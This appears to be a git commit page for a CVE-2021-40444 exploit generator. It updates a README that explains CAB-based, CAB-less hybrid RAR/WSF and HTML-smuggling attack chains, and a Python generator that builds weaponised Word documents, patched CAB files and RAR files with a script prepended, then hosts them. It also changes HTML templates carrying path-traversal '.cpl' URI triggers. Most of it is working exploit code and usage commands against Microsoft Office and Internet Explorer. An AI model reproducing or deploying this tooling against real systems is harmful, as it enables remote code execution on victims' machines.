Browse Source

Added CAB-based IE-only attacks, and CAB-less attacks via hybrid RAR and additional URI schemes

master
d3adc0de 2 months ago
parent
commit
a0d1b8d4c4
  1. 3
      .gitignore
  2. 97
      README.md
  3. BIN
      bin/Rar.exe
  4. BIN
      bin/RarExt.dll
  5. BIN
      bin/RarExt32.dll
  6. 8
      clean.bat
  7. 271
      generator.py
  8. 0
      template/cab-orig-debobfuscated1.html
  9. 34
      template/cab-orig-debobfuscated2.html
  10. 79
      template/cab-orig-j00sean.html
  11. 0
      template/cab-orig-obfuscated.html
  12. 69
      template/cab-uri-debobfuscated1.html
  13. 146
      template/cab-uri-debobfuscated2.html
  14. 3
      template/cab-uri-obfuscated.html
  15. 75
      template/cab-uri-sample1.html
  16. 13
      template/cab-uri-test-obfuscated.html
  17. 68
      template/cabless-rar-sample1.html
  18. 109
      template/cabless-smuggling-sample1.html
  19. 376
      template/index.html
  20. BIN
      test/calc.dll
  21. 11
      test/calc.hta
  22. 6
      test/calc.js
  23. 8
      test/calc.vbs
  24. 1
      test/job-jscript.wsf
  25. 1
      test/job-vbs.wsf
  26. 2
      test/test.js
  27. 51
      util/server.py

3
.gitignore

@ -1,9 +1,8 @@
venv
out
test
srv
.idea
__pycache__
template/sample4-nw.html
!srv/index.html
setup*
*.7z

97
README.md

@ -34,6 +34,11 @@ There are quite a bit of overlooked requirements for this exploit to work, which
Maybe nobody explicitly "released" them to avoid the vulnerability to be exploited more. But now it's patched,
so it should not cause a lot of troubles to release the details.
#### HTML File
As for this [tweet](https://twitter.com/wdormann/status/1440036541112328199) by [Will Dormann](https://twitter.com/wdormann),
the HTML should be at least 4096 bytes in size in order to trigger the "Preview" within MS Word.
#### CAB File
The CAB file needs to be byte-patched to avoid extraction errors and to achieve the ZipSlip:
@ -67,6 +72,62 @@ on this. Up to the curious reader to develop this further.
**NOTE2**: Microsoft Patch blocks arbitrary URI schemes, apparently using a blacklist approach (this is just a supposition)
# DLL Attack
The main attack chain associated with CVE-2021-40444 is the DLL attack loaded via the `.cpl` URI scheme. In order to
exploit that, an attacker needs to generate a specially crafted DLL. If you want to test it out, try my [evildll-gen](https://gist.github.com/klezVirus/e24c94d7061f5736e2452eee022f4011)
script.
# JScript, VBScript, Javaw, MSIexec, ...
As noted by [Max Maluin](https://twitter.com/Max_Mal_), it is possible to interact with several filetypes abusing IE and
the associated file extension based URI. While this is might be a good way to exploit IE, it has limitations.
Indeed, irtshould be noted that the method used in the exploit to download files is based on ActiveX control updates,
and cannot be used to download arbitrary files.
As per Microsoft [documentation](https://docs.microsoft.com/it-it/cpp/mfc/upgrading-an-existing-activex-control?view=msvc-160), the `codebase` tag
can point just to a few filetypes: OCX, INF and CAB.
Even if we can directly download an OCX or INF file, we still can't be sure to download the file in the right location
within the system. With the cab exploit, it is possible to move the `.inf` file in a well-known path using the path traversal,
but in any other case the file will be stored in a random directory, making it virtually impossible to reference it.
As of today, I didn't find a way to chain download and execution WITHOUT a CAB file.
Note: Talking about IE alone, HTML smuggling could be a possible scenario to exploit the vulnerability.
# Cab-less file attack using hybrid RAR file
This technique was firstly disclosed by [Eduardo Braun](https://twitter.com/Edu_Braun_0day) on Twitter and further explained in [this](https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf) paper.
Please note that using this technique, the attack chain is a bit different. This attack requires the user to download
a specially crafted RAR file, obtained by chaining a valid WSF script and a valid RAR file. Once opened, the RAR will contain
a DOCX with a reference to an HTML, which in turn will try to load the RAR file as a WSF script.
To summarise:
1. Specially crafted RAR file is downloaded (likely Download folder)
2. DOCX extracted and opened
3. Relationship stored in document.xml.rels points to malicious html
4. IE preview is launched to open the HTML link
5. JScript within the HTML contains a script/iframe pointing to the RAR file, prefixed with the ".wsf:" URI scheme
6. As the RAR was designed to be contemporaneously a valid RAR and a valid WSF script, the script is executed
# What are the exploits PoC implemented by the tool
The generator utility can currently reproduce the following attacks:
| Attack | HTML Templates | Target | Delivery Method | Execution Method | Working |
|-------------------------------------------|---------------------|--------|-----------------|------------------|-----------------|
| Original version of the attack | cab-orig-* | WORD | DOCX | CAB + DLL | YES |
| j00sean IE-only attack | cab-orig-j00san | IE | HTML | CAB + DLL | YES |
| My version without DLL | cab-uri-* | WORD | DOCX | CAB + JS/VBS | NO<sup>1</sup> |
| Eduardo B. "CABless" attack using RAR | cabless-rar-* | WORD | RAR | WSF | YES |
| Modified j00sean attack + HTML smuggling | cabless-smuggling-* | IE | HTML | JS/VBS | YES<sup>2</sup> |
_<sup>1</sup>The CAB is not downloaded properly in some environments_
_<sup>2</sup>The user needs to click on "Save" to download the file on IE_
# CAB file parser
The utility `cab_parser.py` can be used to see the headers of the exploit file, but don't consider this a full
@ -97,10 +158,12 @@ pip install -r requirements
# Usage
The generator is trivial to use, and has been tested with a number of different DLL payloads.
The generator is trivial to use, and even if it has been tested with a number of different payloads and Windows
versions, it is not fail-proof. I'm encountering different behaviours across different Windows builds. As soon as
I have more details to share, I'll post them here.
```
usage: generator.py [-h] -P PAYLOAD -u URL [-o OUTPUT] [--host] [-p LPORT] [-c COPY_TO]
usage: generator.py [-h] -P PAYLOAD -u URL [-o OUTPUT] [--host] [-c COPY_TO] [-nc] [-t]
[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]
@ -112,14 +175,38 @@ optional arguments:
-o OUTPUT, --output OUTPUT
Output files basename (no extension)
--host If set, will host the payload after creation
-p LPORT, --lport LPORT
Port to use when hosting malicious payload
-c COPY_TO, --copy-to COPY_TO
Copy payload to an alternate path
-nc, --no-cab Use the CAB-less version of the exploit
-t, --test Open IExplorer to test the final HTML file
```
# Example
* Generate the original exploit and test it locally
```
python generator.py -u http://127.0.0.1 -P test\calc.dll --host
```
_Note: the port is selected by the URL, and the exploit is generated basing on the payload file extension_
* Generate the CABless exploit with RAR and test it locally via IE
```
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
```
* Generate the CABless exploit (IE-only) with HTML smuggling and test it locally via IE
```
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
```
# Credits
* [RET2_pwn](https://twitter.com/RET2_pwn) for the amazing blog
* [j00sean](https://twitter.com/j00sean) for the good hints
* [lockedbyte](https://github.com/lockedbyte/CVE-2021-40444) for the first decent poc
* [lockedbyte](https://github.com/lockedbyte/CVE-2021-40444) for the first decent poc
* [Max_Mal](https://twitter.com/Max_Mal) for the hint on the alternate URI schemes
* [wdormann](https://twitter.com/wdormann) for the hint on the HTML file size restrictions
* [Edu_Braun_0day](https://twitter.com/Edu_Braun_0day) for the cool CAB-less version of the exploit

BIN
bin/Rar.exe

Binary file not shown.

BIN
bin/RarExt.dll

Binary file not shown.

BIN
bin/RarExt32.dll

Binary file not shown.

8
clean.bat

@ -0,0 +1,8 @@
@echo off
del /F /Q "setup.inf"
del /F /Q "setup.rpt"
del /F /Q "out\*"
del /F /Q "data\*.dll"
del /F /Q "srv\*"
xcopy /Y /Q "template\index.html" "srv\"

271
generator.py

@ -4,17 +4,22 @@
# Result is ability for attackers to execute arbitrary custom DLL's
# downloaded and executed on target system
import argparse
import base64
import binascii
import random
import re
import secrets
import shutil
import string
import struct
import sys
import os
import subprocess
import tempfile
import time
import traceback
from pathlib import Path
from cab_parser import Cab
from in_place import InPlace
@ -77,7 +82,103 @@ def execute_cmd(cmd, execute_from=None):
exit(1)
def generate_payload(payload, server_url, basename, copy_to=None):
def patch_rar(rar_file, script: bytes):
# JS downloader string
downloader = bytearray(script)
# Appending null byte
# downloader.append(0)
content = bytearray(open(rar_file, "rb").read())
content = bytes(downloader + content)
with open(rar_file, "wb") as rar:
rar.write(content)
def rar(file: Path, rar_file, delete=False):
try:
output = subprocess.check_output(
f"bin\\rar.exe a -ep \"{rar_file}\" \"{str(file)}\"",
stderr=subprocess.STDOUT,
shell=True
)
if delete:
file.unlink(missing_ok=True)
except subprocess.CalledProcessError:
print("[-] Error generating RAR archive")
exit(1)
def make_rar(rar_file):
file_name = None
with tempfile.NamedTemporaryFile(
suffix=".txt",
delete=False,
mode="w"
) as txt_file:
txt_file.write("You've been pwnd!")
file_name = Path(txt_file.name).absolute()
rar(file_name, rar_file, delete=True)
def choose_template(templates: list):
try:
print("[*] Multiple compatible templates identified, choose one:")
choice = -1
for n, t in enumerate(templates, start=0):
print(f" {n}: {t}")
while not 0 <= choice <= len(templates) - 1:
try:
choice = int(input(" $> "))
except ValueError:
continue
return templates[choice]
except KeyboardInterrupt:
print("[-] Aborting")
sys.exit(1)
def append_garbage(content: str, exploit: str):
eol = '\n'
garbage = ""
filler = "A" * 80000
if exploit == ".vbs":
eol = '" _ \n & "'
garbage = rf"""
Dim Garbage
Garbage = "{eol.join([filler[i:i + 100] for i in range(0, len(filler), 100)])}";
"""
elif exploit == ".js":
garbage = f"var x = '';{eol}" + eol.join([f"x = '{filler[i:i + 100]}';" for i in range(0, len(filler), 100)])
elif exploit in [".wsf", ".hta"]:
garbage = f"<!--{eol}{filler}{eol}-->{eol}"
return content + garbage
def get_file_extension_based_uri(exploit, no_cab=False):
if exploit == ".dll":
return ".cpl"
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"] and no_cab:
return exploit
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"]:
return ".wsf"
def get_mime_type(exploit):
if exploit == ".dll":
return "application/octet-stream"
elif exploit == ".hta":
return "application/hta"
elif exploit == ".js":
return "text/javascript"
elif exploit == ".vbs":
return "text/vbscript"
elif exploit == ".wsh":
return "text/plain"
elif exploit == ".wsf":
return "text/xml"
def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False):
# Current Working Directory
working_directory = Path(__file__).parent
@ -94,9 +195,34 @@ def generate_payload(payload, server_url, basename, copy_to=None):
word_dll = data_path.joinpath(f'{basename}.dll')
word_doc = out_path.joinpath('document.docx')
ddf = data_path.joinpath('mswordcab.ddf')
cab_file = out_path.joinpath(f"{basename}.cab")
inf_file = cab_path.joinpath(f"{basename}.inf")
html_template_file = template_path.joinpath("sample3.html")
archive_file = out_path.joinpath(f"{basename}.cab")
rar_file = out_path.joinpath(f"{basename}.rar")
exploit_file = cab_path.joinpath(f"{basename}.inf")
exploit = os.path.splitext(args.payload)[1]
if no_cab and exploit != ".wsf":
print("[-] CAB-less version chosen, only .wsf is currently working")
exit(1)
lolbin = exploit not in [".dll"]
if exploit == ".wsf" and no_cab:
id = "cabless-rar-"
elif lolbin and no_cab:
id = "cabless-smuggling-"
elif lolbin:
id = "cab-uri-"
else:
id = "cab-orig-"
script_file = None
templates = [
f for f in os.listdir(str(template_path))
if os.path.isfile(os.path.join(str(template_path), f))
and f.find(id) > -1
]
html_template_file = template_path.joinpath(choose_template(templates))
html_final_file = srv_path.joinpath(f"{basename}.html")
# Checking ephemeral directories
@ -106,25 +232,44 @@ def generate_payload(payload, server_url, basename, copy_to=None):
out_path.mkdir(exist_ok=True)
print(f' [>] Payload: {payload}')
print(f' [>] HTML/CAB Hosting Server: {server_url}')
print(f' [>] HTML/CAB/JS Hosting Server: {server_url}')
b64_payload = None
payload_content = None
try:
payload_content = open(payload, 'rb').read()
if exploit != ".dll" and no_cab:
payload_content = open(payload, 'r').read().strip().encode()
elif exploit != ".dll":
payload_content = "\x5a\x4d" + open(payload, 'r').read().strip()
payload_content = append_garbage(payload_content, exploit)
payload_content = payload_content.encode()
else:
payload_content = open(payload, 'rb').read()
with open(str(word_dll), 'wb') as filep:
filep.write(payload_content)
b64_payload = base64.b64encode(payload_content).decode()
except FileNotFoundError:
print('[-] DLL Payload specified not found!')
print('[-] Payload specified not found!')
exit(1)
except Exception as e:
print(f"[-] Exception: {e}")
exit(1)
if lolbin and no_cab:
tmp = Path(exploit_file.parent).joinpath(basename + get_file_extension_based_uri(exploit))
exploit_file.unlink(missing_ok=True)
exploit_file = Path(tmp)
with open(str(exploit_file), "w") as out:
out.write(payload_content.decode())
print(f"[*] Exposing script file {exploit_file.name} to the webserver for download")
shutil.copy(str(exploit_file), str(srv_path))
shutil.copytree(str(word_dat_path), str(tmp_path), dirs_exist_ok=True)
print('[*] Crafting Relationships to point to HTML/CAB Hosting Server...')
print('[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...')
with InPlace(str(tmp_path.joinpath("word").joinpath("_rels").joinpath('document.xml.rels'))) as rels:
xml_content = rels.read()
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}')
xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
# xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
rels.write(xml_content)
print('[*] Packing MS Word .docx file...')
@ -133,18 +278,19 @@ def generate_payload(payload, server_url, basename, copy_to=None):
shutil.move(str(word_doc) + ".zip", str(word_doc))
shutil.rmtree(str(tmp_path))
print('[*] Generating CAB file...')
make_ddf(ddf_file=ddf, cab_file=cab_file, inf_file=inf_file)
shutil.move(word_dll, inf_file)
if not no_cab:
print('[*] Generating CAB file...')
make_ddf(ddf_file=ddf, cab_file=archive_file, inf_file=exploit_file)
shutil.move(word_dll, exploit_file)
execute_cmd(f'makecab /F "{ddf.absolute()}"', execute_from=str(working_directory))
patched_path = f'../{inf_file.name}'.encode()
patch_cab(cab_file, str(inf_file.name).encode(), patched_path)
shutil.copy(cab_file, srv_path)
shutil.copy(ddf, srv_path)
execute_cmd(f'makecab /F "{ddf.absolute()}"', execute_from=str(working_directory))
patched_path = f'../{exploit_file.name}'.encode()
patch_cab(archive_file, str(exploit_file.name).encode(), patched_path)
shutil.copy(archive_file, srv_path)
shutil.copy(ddf, srv_path)
word_dll.unlink(missing_ok=True)
inf_file.unlink(missing_ok=True)
exploit_file.unlink(missing_ok=True)
ddf.unlink(missing_ok=True)
shutil.rmtree(str(cab_path.absolute()))
@ -156,25 +302,55 @@ def generate_payload(payload, server_url, basename, copy_to=None):
dest.unlink(missing_ok=True)
shutil.copy(str(word_doc.absolute()), dest)
if copy_to and os.path.isdir(copy_to):
if copy_to and os.path.isdir(copy_to) and not no_cab:
print(f'[*] Copying malicious cab to {copy_to} for analysis...')
dest = Path(copy_to).joinpath(cab_file.name)
dest = Path(copy_to).joinpath(archive_file.name)
dest.unlink(missing_ok=True)
shutil.copy(str(cab_file.absolute()), dest)
print(f' [>] CAB file stored at: {cab_file}')
shutil.copy(str(archive_file.absolute()), dest)
print(f' [>] CAB file stored at: {archive_file}')
with InPlace(str(html_final_file)) as p_exp:
content = p_exp.read()
content = content.replace('<HOST_CHANGE_HERE>', f"{server_url}/{cab_file.name}")
content = content.replace('<INF_CHANGE_HERE>', f"{inf_file.name}")
content = content.replace('<HOST_CHANGE_HERE>', f"{server_url}/{archive_file.name}")
content = content.replace('<INF_CHANGE_HERE>', f"{exploit_file.name}")
content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}")
content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit))
content = content.replace('<BASE64_DATA_HERE>', b64_payload)
content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit))
content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1])
content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2])
content = content.replace('<THIRD_LETTER>', get_file_extension_based_uri(exploit)[3])
p_exp.write(content)
print(f'[+] Success! MS Word Document stored at: {word_doc}')
if exploit == ".wsf" and no_cab:
print(f"[*] Generating RAR file {rar_file.name}... and pushing it to 'Downloads', to emulate user download")
rar_dest = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath(rar_file.name)
wsf_file = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath("test.wsf")
rar(word_doc, rar_dest, delete=False)
patch_rar(rar_file=rar_dest, script=payload_content)
shutil.copy(str(rar_dest), str(srv_path))
shutil.copy(str(rar_dest), str(wsf_file))
return html_final_file.name
def start_server(lport, directory: Path):
this = Path(__file__).parent.joinpath("util").joinpath("server.py")
subprocess.Popen(
f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python -m http.server {lport}',
f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python "{this.absolute()}" localhost {lport}',
shell=True,
close_fds=True,
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
creationflags=subprocess.DETACHED_PROCESS
)
def start_client(url):
subprocess.Popen(
f'"C:\\Program Files\\Internet Explorer\\iexplore.exe" "{url}"',
shell=True,
close_fds=True,
stderr=subprocess.DEVNULL,
@ -209,20 +385,53 @@ if __name__ == '__main__':
help="Output files basename (no extension)")
parser.add_argument('--host', action='store_true', default=False, required=False,
help="If set, will host the payload after creation")
parser.add_argument('-p', '--lport', type=int, default=8080, required=False,
help="Port to use when hosting malicious payload")
parser.add_argument('-c', '--copy-to', type=str, default=None, required=False,
help="Copy payload to an alternate path")
parser.add_argument('-nc', '--no-cab', action='store_true', default=False, required=False,
help="Use the CAB-less version of the exploit")
parser.add_argument('-t', '--test', action='store_true', default=False, required=False,
help="Open IExplorer to test the final HTML file")
args = parser.parse_args()
filename = validate_filename(args.output)
print('[*] Generating a malicious payload...')
html = None
server = args.url
port = 80
try:
scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1]
if scheme == "http":
port = 80
elif scheme == "https":
port = 443
else:
raise NotImplemented(f"Scheme {scheme} is not supported")
if len(server.split(":")) > 2:
port = int(server.split(":")[2].split("/")[0])
except NotImplemented as e:
print(f"[-] {e}")
exit(1)
except (ValueError, KeyError, IndexError):
print("[-] Wrong URL format")
exit(1)
try:
generate_payload(payload=args.payload, server_url=args.url, basename=filename, copy_to=args.copy_to)
html = generate_payload(payload=args.payload, server_url=server, basename=filename, copy_to=args.copy_to,
no_cab=args.no_cab)
except (SystemExit, KeyboardInterrupt):
exit(1)
except:
traceback.print_exc()
if args.host:
print('[*] Hosting HTML Exploit...')
start_server(lport=args.lport, directory=Path(__file__).parent.joinpath("srv"))
exit(1)
if args.host and html:
print(f'[*] Hosting HTML Exploit at {args.url}:{port}/{html}...')
start_server(lport=port, directory=Path(__file__).parent.joinpath("srv"))
if args.test:
if os.path.splitext(args.payload)[1] != ".wsf":
print(f"[-] IE testing might not compatible with {os.path.splitext(args.payload)[1]}")
print(f'[*] Opening IE at {args.url}/{html}...')
time.sleep(3)
start_client(f"{args.url}/{html}")

0
template/sample2.html → template/cab-orig-debobfuscated1.html

34
template/sample3.html → template/cab-orig-debobfuscated2.html

@ -105,39 +105,39 @@ function getValue(totalExpectedResults, entrySelector) {
s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](view["Script"]["document"]["body"], s);
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
iedom["Script"]["location"] = ".cpl" + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
iedom["Script"]["location"] = ".cpl" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
rp_test["Script"]["location"] = "." + _ + colname + i + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
rp_test["Script"]["location"] = ".cpl" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
/** @type {string} */
htmlfile["Script"]["location"] = "." + _ + colname + i + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
htmlfile["Script"]["location"] = ".cpl" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
fake["Script"]["location"] = ".cpl" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
/** @type {string} */
doc["Script"]["location"] = "." + _ + colname + i + ":../../../../../Temp/Low/<INF_CHANGE_HERE>";
doc["Script"]["location"] = ".cpl" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../../../../Temp/<INF_CHANGE_HERE>";
fake["Script"]["location"] = ".cpl" + ":../../../../../Temp/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../Low/<INF_CHANGE_HERE>";
fake["Script"]["location"] = ".cpl" + ":../../Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../<INF_CHANGE_HERE>";
fake["Script"]["location"] = ".cpl" + ":../../<INF_CHANGE_HERE>";
}();
</script>

79
template/cab-orig-j00sean.html

@ -0,0 +1,79 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
<title>CVE-2021-40444</title>
</head>
<body>
<script>
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
